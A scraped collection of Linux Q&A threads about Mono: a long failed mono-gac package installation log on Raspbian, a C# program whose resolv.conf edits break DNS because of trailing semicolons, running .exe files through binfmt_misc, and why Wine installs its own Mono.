System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
E: installing Assembly /usr/lib/cli/nunit.core.interfaces-2.6.3/nunit.core.interfaces.dll failed
E: Installation of libnunit-core-interfaces2.6.3-cil with /usr/share/cli-common/runtimes.d/mono failed
* Installing 1 assembly from libnunit-framework2.6.3-cil into MonoUnhandled Exception:
System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
E: installing Assembly /usr/lib/cli/nunit.framework-2.6.3/nunit.framework.dll failed
E: Installation of libnunit-framework2.6.3-cil with /usr/share/cli-common/runtimes.d/mono failed
* Installing 1 assembly from libnunit-mocks2.6.3-cil into MonoUnhandled Exception:
System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
E: installing Assembly /usr/lib/cli/nunit.mocks-2.6.3/nunit.mocks.dll failed
E: Installation of libnunit-mocks2.6.3-cil with /usr/share/cli-common/runtimes.d/mono failed
* Installing 1 assembly from libnunit-util2.6.3-cil into MonoUnhandled Exception:
System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
E: installing Assembly /usr/lib/cli/nunit.util-2.6.3/nunit.util.dll failed
E: Installation of libnunit-util2.6.3-cil with /usr/share/cli-common/runtimes.d/mono failed
* Installing 1 assembly from policy.2.6.nunit-console-runner into MonoUnhandled Exception:
System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
E: installing Assembly /usr/share/cli-common/policies.d/libnunit-console-runner2.6.3-cil/policy.2.6.nunit-console-runner.dll failed
E: Installation of policy.2.6.nunit-console-runner with /usr/share/cli-common/runtimes.d/mono failed
* Installing 1 assembly from policy.2.6.nunit.core into MonoUnhandled Exception:
System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
E: installing Assembly /usr/share/cli-common/policies.d/libnunit-core2.6.3-cil/policy.2.6.nunit.core.dll failed
E: Installation of policy.2.6.nunit.core with /usr/share/cli-common/runtimes.d/mono failed
* Installing 1 assembly from policy.2.6.nunit.core.interfaces into MonoUnhandled Exception:
System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
E: installing Assembly /usr/share/cli-common/policies.d/libnunit-core-interfaces2.6.3-cil/policy.2.6.nunit.core.interfaces.dll failed
E: Installation of policy.2.6.nunit.core.interfaces with /usr/share/cli-common/runtimes.d/mono failed
* Installing 1 assembly from policy.2.6.nunit.framework into MonoUnhandled Exception:
System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
E: installing Assembly /usr/share/cli-common/policies.d/libnunit-framework2.6.3-cil/policy.2.6.nunit.framework.dll failed
E: Installation of policy.2.6.nunit.framework with /usr/share/cli-common/runtimes.d/mono failed
* Installing 1 assembly from policy.2.6.nunit.mocks into MonoUnhandled Exception:
System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
E: installing Assembly /usr/share/cli-common/policies.d/libnunit-mocks2.6.3-cil/policy.2.6.nunit.mocks.dll failed
E: Installation of policy.2.6.nunit.mocks with /usr/share/cli-common/runtimes.d/mono failed
* Installing 1 assembly from policy.2.6.nunit.util into MonoUnhandled Exception:
System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
E: installing Assembly /usr/share/cli-common/policies.d/libnunit-util2.6.3-cil/policy.2.6.nunit.util.dll failed
E: Installation of policy.2.6.nunit.util with /usr/share/cli-common/runtimes.d/mono failed
dpkg: error processing package mono-gac (--configure):
subprocess installed post-installation script returned error exit status 29
dpkg: dependency problems prevent configuration of mono-runtime-common:
mono-runtime-common depends on mono-gac (= 6.0.0.319-0xamarin1+raspbian9b1); however:
Package mono-gac is not configured yet.
dpkg: error processing package mono-runtime-common (--configure):
dependency problems - leaving unconfigured
Errors were encountered while processing:
mono-gac
mono-runtime-common
E: Sub-process /usr/bin/dpkg returned an error code (1)

apt also recommends running apt --fix-broken install when I do an apt autoremove:
Reading package lists... Done
Building dependency tree
Reading state information... Done
You might want to run 'apt --fix-broken install' to correct these.
The following packages have unmet dependencies:
mono-devel : Depends: ca-certificates-mono (= 6.0.0.319-0xamarin1+raspbian9b1) but 5.12.0.226-0xamarin3+raspbian9b1 is installed
E: Unmet dependencies. Try 'apt --fix-broken install' with no packages (or specify a solution).

Does anyone have a suggestion on how to fix this?
Thank you very much
| apt --fix-broken install fails |
It looks to me like your code is adding a semicolon to the end of each nameserver line; don't do that. resolv.conf expects a bare IP address after nameserver, so 8.8.8.8; does not parse as a valid server address.
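A minimal sketch of the corrected assignments (only the trailing ";" is dropped; everything else stays as in the question):

s1 = "nameserver " + DNSentry1.Text + Environment.NewLine;
s2 = "nameserver " + DNSentry2.Text + Environment.NewLine;
// no ";" appended: the newline alone terminates a resolv.conf line

That matches what manual editing with nano produces, which is why the hand-edited file resolves fine.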
| This is an odd one but I seem to be unable to solve it.
I'm creating a visual user interface to modify internet settings on Debian Wheezy (and other debian versions/derivatives that are incidentally compatible).
I want to be able to modify the DNS on the basis of what the user inserts.
After "Save" is pressed this code is ran:
void SaveDNSButton_event(object obj, ButtonPressEventArgs args)
{
    //save dns settings
    string s1 = "";
    string s2 = "";
    string toWrite = s1 + s2;

    Console.WriteLine ("=============");
    Console.WriteLine ("Reading from resolv.conf before writing...");
    using (StreamReader confReader = File.OpenText ("/etc/resolv.conf")) {
        StringReader sr = new StringReader (confReader.ReadToEnd ());
        string line;
        toWrite = "";
        while (null != (line = sr.ReadLine ())) {
            if (line.Contains ("nameserver")) {
                Console.WriteLine (line);
            } else {
                toWrite += line + Environment.NewLine;
            }
        }
        confReader.Dispose ();
        confReader.Close ();
    }

    s1 = "nameserver " + DNSentry1.Text + ";" + Environment.NewLine;
    s2 = "nameserver " + DNSentry2.Text + ";" + Environment.NewLine;

    Console.WriteLine ("=============");
    Console.WriteLine ("Writing to resolv.conf");
    Console.WriteLine ("To write: " + toWrite + s1 + s2);

    using (StreamWriter confWriter = new StreamWriter ("/etc/resolv.conf", false)) {
        Console.WriteLine ("Writing...");
        confWriter.Write (toWrite + s1 + s2);
        Console.WriteLine ("Closing file stream...");
        confWriter.Dispose ();
        confWriter.Close ();
    }

    Console.WriteLine ("=============");

    Console.WriteLine ("Opening conf to confirm if it worked");
    if (IsLinux) {
        Console.WriteLine ("Trying to open conf");
        StreamReader file = File.OpenText ("/etc/resolv.conf");
        string s = file.ReadToEnd ();
        Console.WriteLine (s);

        file.Dispose ();
        file.Close ();
    }
}

The relevant part is
using (StreamWriter confWriter = new StreamWriter ("/etc/resolv.conf", false)) {
    Console.WriteLine ("Writing...");
    confWriter.Write (toWrite + s1 + s2);
    Console.WriteLine ("Closing file stream...");
    confWriter.Dispose ();
    confWriter.Close ();
}

wherein I overwrite resolv.conf with the filled-in DNS info. An example input would be something like "8.8.8.8" in the first dialog and "8.8.4.4" in the second. The output would be...
=============
Reading from resolv.conf before writing...
nameserver 192.168.2.101
nameserver 8.8.8.8
=============
Writing to resolv.conf
To write: # Generated by NetworkManager
domain trin-it.local
search trin-it.local
nameserver 8.8.8.8;
nameserver 8.8.4.4;

Writing...
Closing file stream...
=============
Opening conf to confirm if it worked
4
Trying to open conf
# Generated by NetworkManager
domain trin-it.local
search trin-it.local
nameserver 8.8.8.8;
nameserver 8.8.4.4;

If I ping google after this it just says: "unknown host google"
HOWEVER, if I manually go to resolv.conf and change the nameservers there it actually resolves just fine. What is up with that? The only change is that I do it through code instead of just nano /etc/resolv.conf, as far as I can tell. Can anyone shed some light on this?
TL;DR
Why would editing resolv.conf with code NOT work as opposed to manually editing it? Wouldn't it be the same thing?
| Resolv.conf modification breaks DNS [closed] |
Ubuntu has this by default, AFAIK. For an idea of how this might work, take a look at: binfmt_misc
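A minimal sketch of the underlying mechanism, assuming binfmt_misc is mounted at /proc/sys/fs/binfmt_misc and the write is done as root; the rule follows the kernel's :name:type:offset:magic:mask:interpreter:flags format, and the /usr/bin/mono interpreter path is an assumption (Debian/Ubuntu normally register an equivalent rule for you through binfmt-support when mono-runtime is installed):

using System.IO;

class RegisterCliBinfmt // illustrative only; distributions usually do this at package install time
{
    static void Main ()
    {
        // Any executable file starting with the PE magic "MZ" is handed to mono,
        // so ./myapp.exe runs directly once its executable bit is set.
        const string rule = ":CLR:M::MZ::/usr/bin/mono:";
        File.WriteAllText ("/proc/sys/fs/binfmt_misc/register", rule);
    }
}

Double-clicking in a file manager is a separate matter of MIME associations and the executable bit, which is why a small wrapper script or .desktop launcher is still the usual approach for GNOME.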
|
I always wondered whether running Mono apps on Linux will ever be possible by just double-clicking the .exe. Right now, to get a launcher in GNOME, the best way is to add a small shell script that runs 'mono myapp.exe' for you.
I remember there were some ideas about adding this to Linux a long time ago, but nothing recently...
| Enable running mono apps by double-clicking on the .exe file |
It seems I've found the answer myself: Wine uses a version of Mono built for the Windows platform while the instance of Mono installed in the system is, obviously, built for Linux.
|
I have installed the latest available Mono from the Mono project repositories (I have also tried installing it from the default system repos) but as soon as I run Wine it asks me about downloading Mono and downloads it if I agree. Why does it need it? Why won't it just use the system Mono instance?
The same applies to the Gecko engine: it asks to download it too instead of just using what comes with Firefox.
| Why does Wine need to install its own instance of Mono when there already is a fresh version of Mono installed in the system? |